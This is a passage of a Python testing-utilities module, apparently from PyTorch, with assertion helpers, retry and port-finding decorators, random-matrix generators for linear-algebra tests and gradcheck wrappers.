raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
    # Run code in a subprocess and capture its stdout/stderr; exceptions in the
    # child surface on the captured stderr rather than being raised here.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
    in conjunction with the `retry_on_connect_failures` decorator, as there is a potential
    race condition where the allocated port may become unavailable before it can be used.
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
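# Illustrative sketch (not part of the original utilities): how a c10d-style
# helper might opt into the retry behaviour above. _example_create_store and its
# body are hypothetical; only retry_on_connect_failures and find_free_port come
# from this file.
@retry_on_connect_failures
def _example_create_store(timeout=30):
    # A real test would construct e.g. a TCPStore here. RuntimeErrors whose
    # message contains ADDRESS_IN_USE are retried with a short random sleep;
    # any other error propagates immediately.
    port = find_free_port()
    return ("localhost", port, timeout)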
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
                if skip_after_retries:
                    raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e
                raise
return f_retry # true decorator
return deco_retry
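# Illustrative sketch of using the decorator above (the helper and path are
# hypothetical): transient OSErrors are retried twice with a short delay and,
# because skip_after_retries=True, the test is skipped rather than failed if
# the error persists.
@retry(OSError, tries=3, delay=1, skip_after_retries=True)
def _example_read_flaky_fixture(path="/tmp/example_fixture.bin"):
    with open(path, "rb") as f:
        return f.read()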
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
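# Illustrative sanity check of the conditioning claim above (the helper below is
# hypothetical and never invoked): with singular values drawn tightly around
# `mean`, torch.linalg.cond should report a value very close to 1.
def _example_check_conditioning():
    a = random_well_conditioned_matrix(5, 5, dtype=torch.float64, device='cpu',
                                       mean=1.0, sigma=0.001)
    return torch.linalg.cond(a)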
# Returns a noncontiguous tensor with the same shape and values as t.
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
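# Illustrative sketch of what noncontiguous_like guarantees (hypothetical helper,
# never invoked): the result has the same shape and values as the input but a
# doubled innermost stride, so it reports itself as non-contiguous.
def _example_noncontiguous_like():
    t = torch.arange(6.).reshape(2, 3)
    nc = noncontiguous_like(t)
    assert not nc.is_contiguous()
    assert torch.equal(nc, t)
    return nc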
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
        # we don't need to sort S
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
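# Worked example of the construction above (illustrative): for k = 4 the raw
# sequence is s = [2, -3, 4, -5]; after s.reciprocal_().add_(1.) the singular
# value magnitudes are [1.5, ~0.667, 1.25, 0.8] -- all distinct and inside
# [2/3, 3/2], so the condition number is at most (3/2) / (2/3) = 9/4.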
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
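# Illustrative check of the algorithm above (hypothetical helper, never invoked):
# the rotations are orthogonal, so the dense form of the result should reproduce
# the eigenvalues arange(1, matrix_size + 1) / matrix_size, all positive, up to
# floating-point error.
def _example_check_sparse_pd_spectrum(matrix_size=8):
    a = random_sparse_pd_matrix(matrix_size, density=0.2)
    eigvals = torch.linalg.eigvalsh(a.to_dense())
    expected = torch.arange(1, matrix_size + 1, dtype=eigvals.dtype) / matrix_size
    return torch.allclose(eigvals, expected)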
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# This helper recursively clones the tensor-type inputs of operators tested by OpInfo.
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
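# Illustrative sketch of calling the wrapper above from a test (the function
# under test is a toy lambda): gradcheck conventionally wants double-precision
# inputs with requires_grad=True.
def _example_gradcheck_usage():
    x = torch.randn(3, 4, dtype=torch.double, requires_grad=True)
    return gradcheck(lambda t: (t * t).sum(), (x,))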
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
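# Illustrative usage of the context manager above (the callee is hypothetical):
#   with set_cwd(os.path.dirname(os.path.abspath(__file__))):
#       run_something_that_depends_on_relative_paths()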
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This decorator runs the wrapped test twice: once with coalesced=True and once
# with coalesced=False, covering both coalesced and uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
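# Hypothetical test method showing the decorator above in use: the test receives
# an extra `coalesced` keyword and is executed twice, once per setting.
#   @coalescedonoff
#   def test_sparse_sum(self, device, coalesced):
#       x, _, _ = self.genSparseTensor((3, 3), 2, 5, not coalesced, device, torch.float64)
#       self.assertEqual(x.sum(), x.to_dense().sum())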
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
    # Return the shared library file from the installed folder if it exists,
    # otherwise fall back to the file in the build folder.
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
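# Illustrative sketch (the class below is hypothetical): wrapping a method so a
# test can run the real implementation while asserting on calls via `wrapper.mock`.
class _ExampleAccumulator:
    @mock_wrapper
    def add(self, n):
        return n + 1

# e.g. in a test:
#   acc = _ExampleAccumulator()
#   acc.add(3)                              # returns 4; real implementation runs
#   acc.add.mock.assert_called_once_with(3)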
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
